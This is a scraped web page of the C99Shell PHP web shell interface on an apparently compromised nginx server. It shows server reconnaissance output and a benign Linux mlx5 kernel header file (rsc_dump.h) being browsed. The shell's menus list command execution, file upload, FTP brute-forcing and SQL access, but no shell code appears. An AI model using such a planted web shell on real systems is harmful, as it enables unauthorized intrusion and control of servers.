!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/src/linux-oracle-headers-5.15.0-1040/include/linux/mlx5/   drwxr-xr-x
Free 83.24 GB of 96.73 GB (86.06%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     rsc_dump.h (1.26 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* SPDX-License-Identifier: GPL-2.0 OR Linux-OpenIB */
/* Copyright (c) 2020 Mellanox Technologies inc. */

#include <linux/mlx5/driver.h>

#ifndef __MLX5_RSC_DUMP
#define __MLX5_RSC_DUMP

enum mlx5_sgmt_type {
    MLX5_SGMT_TYPE_HW_CQPC,
    MLX5_SGMT_TYPE_HW_SQPC,
    MLX5_SGMT_TYPE_HW_RQPC,
    MLX5_SGMT_TYPE_FULL_SRQC,
    MLX5_SGMT_TYPE_FULL_CQC,
    MLX5_SGMT_TYPE_FULL_EQC,
    MLX5_SGMT_TYPE_FULL_QPC,
    MLX5_SGMT_TYPE_SND_BUFF,
    MLX5_SGMT_TYPE_RCV_BUFF,
    MLX5_SGMT_TYPE_SRQ_BUFF,
    MLX5_SGMT_TYPE_CQ_BUFF,
    MLX5_SGMT_TYPE_EQ_BUFF,
    MLX5_SGMT_TYPE_SX_SLICE,
    MLX5_SGMT_TYPE_SX_SLICE_ALL,
    MLX5_SGMT_TYPE_RDB,
    MLX5_SGMT_TYPE_RX_SLICE_ALL,
    MLX5_SGMT_TYPE_PRM_QUERY_QP,
    MLX5_SGMT_TYPE_PRM_QUERY_CQ,
    MLX5_SGMT_TYPE_PRM_QUERY_MKEY,
    MLX5_SGMT_TYPE_MENU,
    MLX5_SGMT_TYPE_TERMINATE,

    MLX5_SGMT_TYPE_NUM, /* Keep last */
};

struct mlx5_rsc_key {
    enum mlx5_sgmt_type rsc;
    int index1;
    int index2;
    int num_of_obj1;
    int num_of_obj2;
    int size;
};

struct mlx5_rsc_dump_cmd;

struct mlx5_rsc_dump_cmd *mlx5_rsc_dump_cmd_create(struct mlx5_core_dev *dev,
                           struct mlx5_rsc_key *key);
void mlx5_rsc_dump_cmd_destroy(struct mlx5_rsc_dump_cmd *cmd);
int mlx5_rsc_dump_next(struct mlx5_core_dev *dev, struct mlx5_rsc_dump_cmd *cmd,
               struct page *page, int *size);
#endif /* __MLX5_RSC_DUMP */

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0043 ]--